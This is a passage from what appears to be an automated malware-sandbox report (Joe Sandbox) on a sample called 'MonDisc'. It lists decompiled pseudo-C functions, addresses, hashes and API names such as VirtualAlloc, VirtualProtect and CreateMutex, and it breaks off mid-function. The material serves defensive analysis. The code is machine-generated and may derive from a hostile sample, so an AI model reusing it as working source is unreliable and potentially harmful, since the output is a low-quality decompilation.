                              0x7ff62c8ff032
                              0x7ff62c8ff03a
                              0x7ff62c8ff03f
                              0x7ff62c8ff044
                              0x7ff62c8ff049
                              0x7ff62c8ff04e
                              0x7ff62c8ff051
                              0x7ff62c8ff057
                              0x7ff62c8ff05b
                              0x7ff62c8ff05e
                              0x7ff62c8ff070
                              0x7ff62c8ff073
                              0x7ff62c8ff07e
                              0x7ff62c8ff080
                              0x7ff62c8ff09e
                              0x7ff62c8ff0b4
                              0x7ff62c8ff0b9
                              0x7ff62c8ff0c5
                              0x7ff62c8ff0c8
                              0x7ff62c8ff0d8
                              0x7ff62c8ff0e2
                              0x7ff62c8ff0e9
                              0x7ff62c8ff0f4
                              0x7ff62c8ff0f6
                              0x7ff62c8ff100
                              0x7ff62c8ff10c
                              0x7ff62c8ff119
                              0x7ff62c8ff123
                              0x7ff62c8ff125
                              0x7ff62c8ff12c
                              0x7ff62c8ff140
                              0x7ff62c8ff144
                              0x7ff62c8ff154
                              0x7ff62c8ff15b
                              0x7ff62c8ff164
                              0x7ff62c8ff16b
                              0x7ff62c8ff16b
                              0x7ff62c8ff16f
                              0x7ff62c8ff17d
                              0x7ff62c8ff18b
                              0x7ff62c8ff195
                              0x7ff62c8ff197
                              0x7ff62c8ff19b
                              0x7ff62c8ff1a4
                              0x7ff62c8ff1ca
                              0x7ff62c8ff1cd
                              0x7ff62c8ff1d2
                              0x7ff62c8ff1d7
                              0x7ff62c8ff1dc
                              0x7ff62c8ff1e0
                              0x7ff62c8ff1e8
                              0x7ff62c8ff1eb
                              0x7ff62c8ff20f

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 5bb62e84b11f6eb4acd98949369f79d43ede561932ff4dab366ffe0822d93bcf
                              • Instruction ID: 6377bbac4fb2feea6185983420b7a21036aba470e4217bb156411cb714e5462a
                              • Opcode Fuzzy Hash: 5bb62e84b11f6eb4acd98949369f79d43ede561932ff4dab366ffe0822d93bcf
                              • Instruction Fuzzy Hash: 15517F32A08A8189EB11CB29D84477967A4FB84BB8F958332DE6D833D5DF3ED845C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B7F0 Relevance: 2.6, APIs: 2, Instructions: 97memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E00007FF67FF62C93B7F0(long long* __rax, long long __rbx, void* __rcx, long long __rsi) {
				int _t24;
				signed int _t25;
				void* _t27;
				long long* _t37;
				signed long long _t45;
				void* _t63;
				long long _t68;
				void* _t72;
				long long* _t75;
				long _t76;
				void* _t78;
				long long _t79;

				_t37 = __rax;
				 *((long long*)(_t72 + 0x10)) = __rbx;
				 *((long long*)(_t72 + 0x18)) = _t68;
				 *((long long*)(_t72 + 0x20)) = __rsi;
				_t79 =  *((intOrPtr*)(__rcx + 0xbe8));
				_t45 =  *((intOrPtr*)(__rcx + 0x694)) + 0x00000003 << 0x0000000a & 0xfffff000;
				r14d = 0;
				_t50 =  ==  ? _t76 : _t79 - _t45;
				_t30 =  ==  ? _t76 : _t79 - _t45;
				if (( ==  ? _t76 : _t79 - _t45) == 0) goto 0x2c93b8a0;
				r9d = 4;
				r8d = 0x103000;
				VirtualAlloc(_t78, _t76); // executed
				_t75 = __rax;
				if (__rax == 0) goto 0x2c93b8a0;
				if (__rax - 0x7ff62c8f4bb6 + _t45 - 0x3fe00000 < 0) goto 0x2c93b8d6;
				if (0x7ff62c8f4bb6 - __rax - 0x3fe00000 < 0) goto 0x2c93b8d6;
				r8d = 0x8000;
				_t24 = VirtualFree(_t63, ??);
				asm("o16 nop [eax+eax]");
				_t25 = E00007FF67FF62C912230(_t24, _t27, __rcx - 0x150);
				if (_t37 + _t45 - 0x7fc00000 >= 0) goto 0x2c93b8a0;
				r14d = r14d + 1;
				if (r14d - 0x1f >= 0) goto 0x2c93b934;
				goto 0x2c93b846;
				 *((long long*)(__rcx + 0xbe8)) = _t75;
				 *((long long*)(__rcx + 0xbf0)) = _t37 + _t45;
				_t14 = _t75 + 0x10; // 0x10
				 *(__rcx + 0xc00) = _t45;
				 *((long long*)(__rcx + 0xbf8)) = _t14;
				 *((intOrPtr*)(__rcx + 0xbe4)) = 4;
				 *_t75 = _t79;
				 *( *((intOrPtr*)(__rcx + 0xbe8)) + 8) = _t45;
				 *((intOrPtr*)(__rcx + 0xc08)) =  *((intOrPtr*)(__rcx + 0xc08)) + _t45;
				return _t25 & 0x7fff0000;
			}















                              0x7ff62c93b7f0
                              0x7ff62c93b7f0
                              0x7ff62c93b7f5
                              0x7ff62c93b7fa
                              0x7ff62c93b816
                              0x7ff62c93b828
                              0x7ff62c93b82f
                              0x7ff62c93b842
                              0x7ff62c93b846
                              0x7ff62c93b849
                              0x7ff62c93b84b
                              0x7ff62c93b851
                              0x7ff62c93b85a
                              0x7ff62c93b860
                              0x7ff62c93b866
                              0x7ff62c93b878
                              0x7ff62c93b887
                              0x7ff62c93b88b
                              0x7ff62c93b894
                              0x7ff62c93b89a
                              0x7ff62c93b8a7
                              0x7ff62c93b8bc
                              0x7ff62c93b8c5
                              0x7ff62c93b8cf
                              0x7ff62c93b8d1
                              0x7ff62c93b8e5
                              0x7ff62c93b8ec
                              0x7ff62c93b8f3
                              0x7ff62c93b8f7
                              0x7ff62c93b8fe
                              0x7ff62c93b901
                              0x7ff62c93b90b
                              0x7ff62c93b915
                              0x7ff62c93b919
                              0x7ff62c93b933

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 0f7646565ba74cff3643f04de9dfd9104d266136aced4bd7108743d174fba979
                              • Instruction ID: 49213d4773f531b0bd14cfebaf175c4abf7a3543b1691214cf5ab5318fabaa5f
                              • Opcode Fuzzy Hash: 0f7646565ba74cff3643f04de9dfd9104d266136aced4bd7108743d174fba979
                              • Instruction Fuzzy Hash: C031C022F18A8682EE18DF21E8143BA7764FB84BA8F584631CF6E43795DF3CD1428305
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C984AF0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                              Download Yara Rule
                              C-Code - Quality: 15%
                              			E00007FF67FF62C984AF0(long long __rbx, void* __rcx, signed int __rdx, long long __rdi, void* __rbp, long long __r14, long long _a8, long long _a16, long long _a24) {
				signed long long _v24;
				int _t20;
				void* _t28;
				void* _t31;
				void* _t41;
				void* _t43;
				void* _t51;
				void* _t62;
				signed int* _t64;
				signed long long _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				intOrPtr* _t69;
				signed long long _t73;
				void* _t77;
				intOrPtr _t78;
				void* _t80;
				signed long long* _t85;
				void* _t89;
				signed long long _t94;
				intOrPtr _t96;
				signed long long _t97;
				void* _t98;
				signed long long _t102;
				signed long long _t106;

				_a8 = __rbx;
				_a16 = __rdi;
				_a24 = __r14;
				_t41 = _t31;
				_t64 = __rdx - 3;
				if (_t64 - 1 <= 0) goto 0x2c984c96;
				_t43 = _t31 - 0x16;
				if (_t43 > 0) goto 0x2c984bdb;
				asm("bt eax, ecx");
				if (_t43 >= 0) goto 0x2c984bdb;
				r15d = 0;
				0x2c9c5b38();
				if (_t41 == 2) goto 0x2c984b48;
				if (_t41 != 0x15) goto 0x2c984b82;
				if ( *0x2ca377e8 != 0) goto 0x2c984b82;
				_t20 = SetConsoleCtrlHandler(??, ??); // executed
				if (_t20 == 0) goto 0x2c984b70;
				 *0x2ca377e8 = 1;
				goto 0x2c984b82;
				0x2c984d64();
				 *_t64 =  *0x2c9ee040();
				E00007FF67FF62C984730(_t21, _t20, 0x7ff62c984698);
				if (_t64 == 0) goto 0x2c984bc1;
				_t94 =  *0x2ca361d8; // 0x9df21b6e58a1
				_t106 = _t94 ^  *_t64;
				asm("dec ecx");
				_v24 = _t106;
				if (__rdx == 2) goto 0x2c984bc1;
				asm("dec ecx");
				_t102 = __rdx ^ _t94;
				 *_t64 = _t102;
				E00007FF67FF62C9C5B8C();
				if (1 != 0) goto 0x2c984c96;
				_t65 = _t106;
				goto 0x2c984cb4;
				_t51 = _t41 - 0xb;
				if (_t51 > 0) goto 0x2c984c96;
				asm("bt eax, edi");
				if (_t51 >= 0) goto 0x2c984c96;
				E00007FF67FF62C9C5560(_t65, _t64, __rdx, _t89);
				_t73 = _t65;
				if (_t65 == 0) goto 0x2c984c96;
				_t77 =  *_t65;
				_t66 = _t77;
				if (_t77 != 0x2ca16e00) goto 0x2c984c41;
				_t78 =  *0x2ca16ec8; // 0xc0
				E00007FF67FF62C9C5A90(_t78);
				 *_t73 = _t66;
				if (_t66 == 0) goto 0x2c984c96;
				E00007FF67FF62C975500();
				_t80 =  *_t73;
				_t67 = _t80;
				_t96 =  *0x2ca16ec0; // 0xc
				_t97 = _t96 + _t96;
				goto 0x2c984c5a;
				if ( *((intOrPtr*)(_t67 + 4)) == _t41) goto 0x2c984c61;
				_t68 = _t67 + 0x10;
				if (_t68 != _t67 + _t97 * 8) goto 0x2c984c51;
				if (_t68 == 0) goto 0x2c984c96;
				_t11 = _t68 + 8; // 0x8
				_t85 = _t11;
				if (_t102 == 2) goto 0x2c984c91;
				_t98 = _t80 + _t97 * 8;
				if (_t68 == _t98) goto 0x2c984c91;
				if ( *((intOrPtr*)(_t85 - 4)) != _t41) goto 0x2c984c91;
				 *_t85 = _t102;
				_t15 =  &(_t85[2]) - 8; // -16
				if (_t15 != _t98) goto 0x2c984c7c;
				_t69 =  *_t85;
				goto 0x2c984cb4;
				_t62 = _t41 - 0x11;
				if (_t62 > 0) goto 0x2c984ca5;
				asm("bt eax, edi");
				if (_t62 < 0) goto 0x2c984cb0;
				_t28 = E00007FF67FF62C984D84(_t69);
				 *_t69 = 0x16;
				return _t28;
			}





























                              0x7ff62c984af0
                              0x7ff62c984af5
                              0x7ff62c984afa
                              0x7ff62c984b08
                              0x7ff62c984b0a
                              0x7ff62c984b12
                              0x7ff62c984b18
                              0x7ff62c984b1b
                              0x7ff62c984b26
                              0x7ff62c984b29
                              0x7ff62c984b31
                              0x7ff62c984b38
                              0x7ff62c984b41
                              0x7ff62c984b46
                              0x7ff62c984b4f
                              0x7ff62c984b5d
                              0x7ff62c984b65
                              0x7ff62c984b67
                              0x7ff62c984b6e
                              0x7ff62c984b70
                              0x7ff62c984b7e
                              0x7ff62c984b84
                              0x7ff62c984b8c
                              0x7ff62c984b8e
                              0x7ff62c984b9e
                              0x7ff62c984ba3
                              0x7ff62c984ba6
                              0x7ff62c984baf
                              0x7ff62c984bb8
                              0x7ff62c984bbb
                              0x7ff62c984bbe
                              0x7ff62c984bc6
                              0x7ff62c984bcd
                              0x7ff62c984bd3
                              0x7ff62c984bd6
                              0x7ff62c984bdb
                              0x7ff62c984bde
                              0x7ff62c984be9
                              0x7ff62c984bec
                              0x7ff62c984bf2
                              0x7ff62c984bf7
                              0x7ff62c984bfd
                              0x7ff62c984c03
                              0x7ff62c984c06
                              0x7ff62c984c13
                              0x7ff62c984c15
                              0x7ff62c984c1c
                              0x7ff62c984c21
                              0x7ff62c984c27
                              0x7ff62c984c36
                              0x7ff62c984c3b
                              0x7ff62c984c3e
                              0x7ff62c984c41
                              0x7ff62c984c48
                              0x7ff62c984c4f
                              0x7ff62c984c54
                              0x7ff62c984c56
                              0x7ff62c984c5d
                              0x7ff62c984c64
                              0x7ff62c984c66
                              0x7ff62c984c66
                              0x7ff62c984c71
                              0x7ff62c984c73
                              0x7ff62c984c7a
                              0x7ff62c984c7f
                              0x7ff62c984c81
                              0x7ff62c984c88
                              0x7ff62c984c8f
                              0x7ff62c984c91
                              0x7ff62c984c94
                              0x7ff62c984c96
                              0x7ff62c984c99
                              0x7ff62c984ca0
                              0x7ff62c984ca3
                              0x7ff62c984ca5
                              0x7ff62c984caa
                              0x7ff62c984cc9

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ConsoleCtrlHandler
                              • String ID:
                              • API String ID: 1513847179-0
                              • Opcode ID: 6fa80a80079bc4ac5a5af35f5006aea7ee153ea777ff53b52fbba4876d3b07a9
                              • Instruction ID: 60c2f081685211e1f1a4783eab2d387979f389ba49f7d24bae0cd4ce4978e3b4
                              • Opcode Fuzzy Hash: 6fa80a80079bc4ac5a5af35f5006aea7ee153ea777ff53b52fbba4876d3b07a9
                              • Instruction Fuzzy Hash: E1419E62F08A4282FF14CB15DC606B92B99AF96BF0F458A36D94DC77D7DE7CE4448202
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 000002247AB73DAF Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000016.00000002.505828855.000002247AB40000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002247AB40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_2247ab40000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ffc95fc358466f7e87ee8928ce5defe830781478deb736284900a12d07eec796
                              • Instruction ID: 0668ed45946c4935d60a65f631dc46f719ba550dec7a093f33be25e33be4f00e
                              • Opcode Fuzzy Hash: ffc95fc358466f7e87ee8928ce5defe830781478deb736284900a12d07eec796
                              • Instruction Fuzzy Hash: 6231442146C9A8BAF62CF7D08C0E37DF7ACEB55700FA40457C6B78B0D2D3A9841D5692
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 000002247AB74036 Relevance: 1.6, APIs: 1, Instructions: 92synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.505828855.000002247AB40000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002247AB40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_2247ab40000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: c5d6d032f35a6ed2b8544d8ac8ea4a382a2f8e815242c09f89e5186f177afd47
                              • Instruction ID: eac6a2f7f7f9e703709d76b71f6c68014ca392cfaf42ad5f013b4c6b10d496d7
                              • Opcode Fuzzy Hash: c5d6d032f35a6ed2b8544d8ac8ea4a382a2f8e815242c09f89e5186f177afd47
                              • Instruction Fuzzy Hash: 5421302256CCB8A9FA2536D00C5E73CFA2CD762397F6400A3CBB7490D293DD048A56C6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 000002247AB73F7F Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.505828855.000002247AB40000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002247AB40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_2247ab40000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: 600a42b5ae6fc77c6bc28b4d1a9fe0be12661087918726e86373f52275f204c4
                              • Instruction ID: a3ce5a61094d1aac5383ac801264087901d022788e6a374b02142aa2eb1eac7f
                              • Opcode Fuzzy Hash: 600a42b5ae6fc77c6bc28b4d1a9fe0be12661087918726e86373f52275f204c4
                              • Instruction Fuzzy Hash: F011EE1259DDB8A9F22933D04C2E3BCEA7CDB62781FA80063C6A78E0D1C38D444F5592
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9C5ECC Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E00007FF67FF62C9C5ECC(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x2c9c5eeb;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x2c9c5f2e;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x2c9c5f12;
				if (E00007FF67FF62C9C3C14(1) == 0) goto 0x2c9c5f2e;
				if (E00007FF67FF62C9E25C0(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x2c9c5f2e;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x2c9c5efd;
				goto 0x2c9c5f3b;
				E00007FF67FF62C984D84(_t22);
				 *_t22 = 0xc;
				return 0;
			}





                              0x7ff62c9c5ecc
                              0x7ff62c9c5edb
                              0x7ff62c9c5edf
                              0x7ff62c9c5edf
                              0x7ff62c9c5ee9
                              0x7ff62c9c5ef7
                              0x7ff62c9c5efb
                              0x7ff62c9c5f04
                              0x7ff62c9c5f10
                              0x7ff62c9c5f21
                              0x7ff62c9c5f2a
                              0x7ff62c9c5f2c
                              0x7ff62c9c5f2e
                              0x7ff62c9c5f33
                              0x7ff62c9c5f40

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 521979925fef54ab3c699b8e534cf5da6c91fcc543d220d43a7f0518cf905923
                              • Instruction ID: 114291eef664bf58182e2d4a33ced919b9a71479c86af2593be20bafe766e1df
                              • Opcode Fuzzy Hash: 521979925fef54ab3c699b8e534cf5da6c91fcc543d220d43a7f0518cf905923
                              • Instruction Fuzzy Hash: 0DF09054F0920341FE695B629D113B552941F5CBB0F5C5431CD0EC67C3ED2CE690E223
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B610 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E00007FF67FF62C93B610(long long* __rax, long long __rbx, long long __rcx, long long* __rdx, void* _a8, long long _a16) {
				int _t11;
				long long* _t26;
				void* _t27;

				_a16 = __rbx;
				_t26 = __rdx;
				if ( *((intOrPtr*)(__rcx + 0xbe8)) != 0) goto 0x2c93b636;
				E00007FF67FF62C93B7F0(__rax, __rcx, __rcx, _t27); // executed
				goto 0x2c93b665;
				if ( *((intOrPtr*)(__rcx + 0xbe4)) == 4) goto 0x2c93b665;
				r8d = 4; // executed
				_t11 = VirtualProtect(??, ??, ??, ??); // executed
				if (_t11 == 0) goto 0x2c93b681;
				 *((intOrPtr*)(__rcx + 0xbe4)) = 4;
				 *_t26 =  *((intOrPtr*)(__rcx + 0xbf8));
				return _t11;
			}






                              0x7ff62c93b610
                              0x7ff62c93b61d
                              0x7ff62c93b62a
                              0x7ff62c93b62f
                              0x7ff62c93b634
                              0x7ff62c93b63d
                              0x7ff62c93b64b
                              0x7ff62c93b651
                              0x7ff62c93b659
                              0x7ff62c93b65b
                              0x7ff62c93b66c
                              0x7ff62c93b680

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Virtual$Protect$AllocFree
                              • String ID:
                              • API String ID: 3729553426-0
                              • Opcode ID: 8f05001ae3a681e52af4ae4ae8ee654af86365180a678d0bc3cfca32081500b6
                              • Instruction ID: 8bd9e3f5ad4bb10ba5b78c4658b83e065430e7855b1ba5beee143c97626bcd66
                              • Opcode Fuzzy Hash: 8f05001ae3a681e52af4ae4ae8ee654af86365180a678d0bc3cfca32081500b6
                              • Instruction Fuzzy Hash: F3F0EC61B0968685EF54AF26E9547F93360EB48FACF081036DF1E8B756CF38D5508711
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F5074 Relevance: 1.5, APIs: 1, Instructions: 30synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: CreateMutex
                              • String ID:
                              • API String ID: 1964310414-0
                              • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                              • Instruction ID: d40060df0a17990a106941c19d1d09c044d5f018af3adc10a767e17fd0b3a797
                              • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                              • Instruction Fuzzy Hash: E3013C26204E8589DB159F3AC8504ACBBF4FB49F9DB088225DF899732CEF35D545C740
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8FF9D0 Relevance: 1.4, APIs: 1, Instructions: 114COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00007FF67FF62C8FF9D0() {
				long _t43;
				void* _t47;
				intOrPtr _t61;
				intOrPtr* _t73;
				long long _t75;
				long long _t76;
				long long _t78;
				signed long long _t80;
				void* _t84;
				long long _t94;
				void* _t96;
				signed long long _t100;
				intOrPtr _t108;
				void* _t112;
				void* _t114;
				void* _t115;
				signed long long _t117;
				signed int _t121;
				long long _t127;

				 *((long long*)(_t114 + 0x18)) = _t75;
				_t115 = _t114 - 0x20;
				_t127 = _t94;
				_t76 = _t78;
				E00007FF67FF62C984D84(_t73);
				_t61 =  *_t73;
				 *((intOrPtr*)(_t115 + 0x60)) = _t61;
				_t43 = GetLastError();
				_t117 =  *((intOrPtr*)(_t76 + 0x20));
				r15d = _t43;
				_t108 =  *((intOrPtr*)(_t76 + 0x10));
				_t80 =  *(_t76 + 0x50) & 0xfffffffc;
				 *(_t115 + 0x68) = _t43;
				r8d =  *(_t80 + 0x20);
				 *((long long*)(_t80 + 0x60)) = _t127;
				_t112 =  *((intOrPtr*)(( *(_t117 - 0x10) & 0xffffffff) + 0x20)) - 0x68;
				r8d = E00007FF67FF62C8FEF60(0xffffffff, _t112, _t127);
				_t121 = _t117 * 8;
				 *((long long*)(_t76 + 0x28)) =  *((intOrPtr*)(_t76 + 0x20)) + _t121;
				_t84 = _t108 + 0x2d8;
				if ( *((intOrPtr*)(_t84 + 0xec)) == 0) goto 0x2c8ffa78;
				_t96 = _t127 - 4;
				 *((long long*)(_t84 + 0x80)) = _t76;
				E00007FF67FF62C910750(_t44, _t84, _t96); // executed
				if (( *(_t108 + 0x91) & 0x00000008) == 0) goto 0x2c8ffab2;
				if ( *((intOrPtr*)(_t108 + 0x148)) != 0) goto 0x2c8ffab2;
				 *((intOrPtr*)(_t108 + 0x148)) =  *((intOrPtr*)(_t108 + 0x14c));
